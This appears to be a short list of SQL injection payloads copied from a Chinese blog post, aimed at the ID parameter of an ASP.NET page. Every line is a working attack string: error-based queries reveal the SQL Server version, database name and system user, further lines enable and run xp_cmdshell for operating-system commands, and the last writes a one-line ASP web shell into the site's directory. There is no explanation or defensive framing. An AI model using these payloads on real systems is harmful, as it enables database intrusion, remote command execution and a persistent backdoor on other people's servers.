NewsDetails.aspx?ID=2' and 1=(select @@version) and '1'='1
NewsDetails.aspx?ID=2' and 1=(select db_name()) and '1'='1
NewsDetails.aspx?ID=2' and 1=(select system_user) and '1'='1
2';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE and '1'=1
2';exec master.dbo.xp_cmdshell 'ipconfig >d:\code\web-attackDome\web-attackDome\1.txt'--
2' exec master.dbo.xp_cmdshell 'echo hacked by MXi4oyu >d:\code\web-attackDome\web-attackDome\1.txt'--
2';exec master.dbo.xp_cmdshell 'echo ^<execute request("123")^> >d:\code\web-attackDome\web-attackDome\1.aspx’--
原文链接: http://blog.csdn.net/mypc2010/article/details/8209080